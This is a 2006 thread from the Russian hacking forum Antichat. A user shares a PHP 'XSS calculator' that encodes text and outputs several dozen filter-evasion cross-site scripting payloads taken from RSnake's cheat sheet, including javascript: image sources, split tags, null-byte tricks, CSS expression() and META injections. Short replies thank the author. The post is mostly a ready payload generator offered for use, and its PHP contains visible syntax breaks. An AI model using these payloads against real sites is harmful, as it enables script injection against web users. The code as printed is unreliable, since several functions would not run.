Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Small XSS calculator (https://forum.antichat.xyz/showthread.php?t=28012)

gemaglabin 26.11.2006 18:19
Small XSS calculator
 
Очередная маленькая утилита.На этот раз всего лишь кодирует ascii текст в различные формы,этакий xss калькулятор.

База xss уязвимостей была взята у ha.ckers.org ( XSS (Cross Site Scripting) Cheat Sheet by RSnake).

Скрипт использует AJAX - технологии,то есть для работоспособности java-script должен быть включен.В ie почему-то отображается не весь текст.

http://underwater.cup.su/xss/

gemaglabin 27.11.2006 01:03
Тем кому интересно вот исходник и база уязвимостей

PHP код:
function asciitohex($str
 {
  for ($i=0;$i<strlen($str);$i++)
  { 
   $mystr .= '%'.bin2hex($str[$i]);
  }
  return $mystr;
 }

 function entityenc($str
 {
  for ($i=0;$i<strlen($str);$i++)
  { 
   $mystr .= "&#" ord($str[$i]);
  }
  return $mystr;
 }
 
 function asciitodec($str
 {
  for ($i=0;$i<strlen($str);$i++)
  { 
   $mystr .= ord($str[$i]).",";
  }
   $mystr substr($mystr,0,strlen($mystr)-1);
   return $mystr;
 }
 
 function asciitobase($str)
 {
  return base64_encode($str);
 } 
PHP код:
echo ('alert(String.fromCharCode('.asciitodec($_POST['text']).'))');
echo ("'';!--".chr(34)."<XSS>=&{()}");
echo ("<IMG SRC=".chr(34)."javascript:alert('".$_POST['text']."');".chr(34).">");
echo ("<IMG SRC=javascript:alert('".$_POST['text']."')>");
echo ("<IMG SRC=JaVaScRiPt:alert('".$_POST['text']."')>");
echo ("<IMG SRC=javascript:alert(".htmlspecialchars($_POST['text'],ENT_QUOTES).")>");
echo ('<IMG """><SCRIPT>alert("'.$_POST['text'].'")</SCRIPT>">');
echo ('<IMG SRC=javascript:alert(String.fromCharCode('.asciitodec($_POST['text']).'))>');
echo ('<IMG SRC="jav    ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ('<IMG SRC="jav&#x09;ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ('<IMG SRC="jav&#x0A;ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ('<IMG SRC="jav&#x0D;ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ("perl -e 'print ".chr(34)."<IMG SRC=java\0script:alert(".chr(34).$_POST['text'].chr(34).")>".chr(34).";' > out");
echo ("perl -e 'print ".chr(34)."<SCR\0IPT>alert(".chr(34).$_POST['text'].chr(34).")</SCR\0IPT>".chr(34).";' > out");
echo ("<IMG SRC=".chr(34)."   javascript:alert('".$_POST['text']."');".chr(34).">");
echo ("<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(".chr(34).$_POST['text'].chr(34).")>");
echo ('<<SCRIPT>alert("'.$_POST['text'].'");//<</SCRIPT>');
echo ('<IMG SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).')"');
echo ('<SCRIPT>a=/'.chr(39).$_POST['text'].chr(39).'/alert(a.source)</SCRIPT>');
echo ('\";alert('.chr(39).$_POST['text'].chr(39).');//');
echo ('</TITLE><SCRIPT>alert("'.$_POST['text'].'");</SCRIPT>');
echo ('<INPUT TYPE="IMAGE" SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<BODY BACKGROUND="javascript:alert('.chr(39).$_POST['text'].chr(39).')">');
echo ("<BODY ONLOAD=alert('".$_POST['text']."')>");
echo ('<IMG DYNSRC="javascript:alert('.chr(39).$_POST['text'].chr(39).')">);');
echo ('<IMG LOWSRC="javascript:alert('.chr(39).$_POST['text'].chr(39).')">);');
echo ('<BGSOUND SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<BR SIZE="&{alert('.chr(39).$_POST['text'].chr(39).')}">');
echo ('<LINK REL="stylesheet" HREF="javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<STYLE>li {list-style-image: url("javascript:alert('.chr(39).$_POST['text'].chr(39).')");}</STYLE><UL><LI>'.$_POST['text']);
echo ("<IMG SRC='vbscript:msgbox(".chr(34).$_POST['text'].chr(34).")'>");
echo ('<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<IFRAME SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');"></IFRAME>');
echo ('<FRAMESET><FRAME SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');"></FRAMESET>');
echo ('<TABLE BACKGROUND="javascript:alert('.chr(39).$_POST['text'].chr(39).')">');
echo ('<TABLE><TD BACKGROUND="javascript:alert('.chr(39).$_POST['text'].chr(39).')">');
echo ('<DIV STYLE="background-image: url(javascript:alert('.chr(39).$_POST['text'].chr(39).'))">');
echo ('<DIV STYLE="width: expression(alert('.chr(39).$_POST['text'].chr(39).'));">');
echo ("<STYLE>@im\port'\ja\vasc\ript:alert(".chr(34).$_POST['text'].chr(34).")';</STYLE>");
echo ('<XSS STYLE="xss:expression(alert('.chr(39).$_POST['text'].chr(39).'))">');
echo ('<STYLE TYPE="text/javascript">alert('.chr(39).$_POST['text'].chr(39).');</STYLE>');
echo ('<STYLE>.XSS{background-image:url("javascript:alert('.chr(39).$_POST['text'].chr(39).')");}</STYLE><A CLASS=XSS></A>');
echo ('<BASE HREF="javascript:alert('.chr(39).$_POST['text'].chr(39).');//">');
echo ('<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('.chr(39).$_POST['text'].chr(39).')&lt;/SCRIPT&gt;">');
 echo("<br/><b><center>Used XSS (Cross Site Scripting) Cheat Sheet at ha.ckers.org</b></center>"); 

Zadoxlik 28.11.2006 18:20
У меня файрфокс завис((((((((((((((((((((((((((((((((

gemaglabin 28.11.2006 18:22
ЫЫыы так тебе и надо %)

Gh0s7 28.11.2006 18:25
Гема, полезная весч, спасибо.
P.s.А у меня фф все быстро отработал)

EPIDEM 28.11.2006 18:27
Мля, в фф лаги.... =/

jonart 06.12.2006 01:46
gemaglabin молодца респект!


Время: 21:53